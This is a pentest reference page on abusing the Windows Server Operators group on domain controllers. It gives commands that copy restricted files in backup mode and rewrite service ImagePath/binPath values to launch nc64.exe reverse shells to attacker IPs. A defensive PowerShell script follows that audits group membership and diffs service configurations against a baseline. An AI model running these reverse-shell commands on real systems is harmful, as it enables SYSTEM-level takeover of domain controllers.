Server Operators
Information
The Server Operators group exists only on domain controllers (DCs) and is used for managing the DC as a whole, including service configurations and files. Its members can create and delete network shared resources, start and stop services, back up and restore files, and change installed binaries on the DCs. The group is considered a service administrator group because its members effectively have physical-level access to DCs.
Well-known SID/RID: S-1-5-32-549
Membership allows backing up any file regardless of its permissions, which amounts to arbitrary read access.
Membership allows overwriting legitimate executables with versions that contain malicious code, which can be used for privilege escalation.
Exploitation
Accessing Files
# copy "restricted" data
robocopy /b C:\users\administrator\desktop C:\programdata\temp
ImagePath
Members of this group can manage services. By modifying a service's ImagePath, SYSTEM-level access can be gained.
# change ImagePath
reg add "HKLM\System\CurrentControlSet\services\wuauserv" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\System32\spool\drivers\color\nc64.exe -e powershell.exe 10.10.14.6 1337" /f
# confirm change
reg query "HKLM\System\CurrentControlSet\services\wuauserv"
# start service
Start-Service wuauserv
binPath
Similarly to ImagePath, a service's binPath can be changed with sc.exe.
# change binPath
sc.exe config browser binPath= "C:\programdata\nc64.exe -e cmd.exe 10.10.14.19 443"
# stop the service
sc.exe stop browser
# start the service
sc.exe start browser
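The three abuses above (backup-mode file copy, ImagePath rewrite, binPath rewrite) all rest on the same two facts a defender can check: who is in Server Operators, and whether any service's binary path or run-as account has drifted from a known-good state. The following PowerShell script is an added defensive example, not part of the original page or of any project it describes. It lists the group's members by its well-known SID and diffs the current service configuration against a saved baseline, so a changed ImagePath or binPath stands out wherever the replacement binary was placed. It assumes it is run with administrative rights on a DC that has the ActiveDirectory module; the baseline file location is a placeholder.

```powershell
<#
 Added defensive audit example (not from the original page).
 1. Enumerates Server Operators membership (SID S-1-5-32-549), expanding nested groups.
 2. Records every service's PathName / StartName / StartMode to a JSON baseline
    on first run, and on later runs reports any service whose path or account changed.
 Assumes: administrative rights on a DC, ActiveDirectory module present,
 and a placeholder baseline path that Server Operators members cannot write to.
#>
param(
    [string]$BaselinePath = "$env:ProgramData\svc-baseline.json"   # placeholder location
)

Import-Module ActiveDirectory

# 1. Who can perform the actions described on this page?
$members = Get-ADGroupMember -Identity 'S-1-5-32-549' -Recursive |
    Select-Object -Property SamAccountName, objectClass
Write-Host "Server Operators members:" -ForegroundColor Cyan
$members | Format-Table -AutoSize

# 2. Snapshot the current service configuration, keyed by service name.
$current = @{}
Get-CimInstance -ClassName Win32_Service | ForEach-Object {
    $current[$_.Name] = [pscustomobject]@{
        PathName  = $_.PathName    # ImagePath / binPath as the SCM sees it
        StartName = $_.StartName   # account the service runs as (often LocalSystem)
        StartMode = $_.StartMode
    }
}

if (-not (Test-Path -Path $BaselinePath)) {
    # First run: persist the known-good state and stop.
    $current | ConvertTo-Json -Depth 3 | Set-Content -Path $BaselinePath -Encoding UTF8
    Write-Host "Baseline written to $BaselinePath"
    return
}

# 3. Compare against the baseline: new services, changed paths, changed accounts.
$baseline = Get-Content -Path $BaselinePath -Raw | ConvertFrom-Json
$findings = foreach ($name in $current.Keys) {
    $now = $current[$name]
    $was = $baseline.$name
    if ($null -eq $was) {
        [pscustomobject]@{ Service = $name; Change = 'NEW SERVICE';     Before = $null;          After = $now.PathName }
    }
    elseif ($was.PathName -ne $now.PathName) {
        [pscustomobject]@{ Service = $name; Change = 'PATH CHANGED';    Before = $was.PathName;  After = $now.PathName }
    }
    elseif ($was.StartName -ne $now.StartName) {
        [pscustomobject]@{ Service = $name; Change = 'ACCOUNT CHANGED'; Before = $was.StartName; After = $now.StartName }
    }
}

if ($findings) {
    Write-Host "Service changes since baseline:" -ForegroundColor Yellow
    $findings | Format-Table -AutoSize
} else {
    Write-Host "No service path or account changes since baseline."
}
```

A baseline diff is used instead of a simple "is the binary under C:\Windows" allowlist on purpose: the ImagePath example on this page drops its payload under C:\Windows\System32\spool\drivers\color, a location a path allowlist would accept. Run the script once to create the baseline, then on a schedule; pair it with object-access auditing on HKLM\System\CurrentControlSet\Services so that value modifications also surface as Event ID 4657 in the Security log, and keep Server Operators membership empty unless there is a documented need.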